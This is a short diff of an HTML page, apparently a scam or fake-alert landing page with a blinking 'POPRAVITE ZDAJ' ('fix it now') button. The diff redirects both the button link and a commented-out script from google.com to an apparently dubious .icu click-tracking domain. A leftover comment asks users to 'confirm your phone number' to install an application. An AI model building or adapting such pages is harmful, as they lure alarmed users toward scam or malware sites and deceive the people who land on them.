--- a/index.html
+++ b/index.html
@@ -119,7 +119,7 @@
                 <p></p>
             </section>
             <footer>
-                <p align="center"><a class="btn blink" href="https://www.google.com/" onclick="someFunction()">POPRAVITE ZDAJ</a></p>
+                <p align="center"><a class="btn blink" href="https://pields-ladayeast.icu/click" onclick="someFunction()">POPRAVITE ZDAJ</a></p>
             </footer>
         </div>
        <!--  <script>
@@ -146,7 +146,7 @@
         function someFunction() {
             // alert("Confirm your phone number on the next page to install the application.");
             window.onbeforeunload = null;
-            window.location = 'https://www.google.com/';
+            window.location = 'https://pields-ladayeast.icu/click';
         }
         </script> -->
     </div>
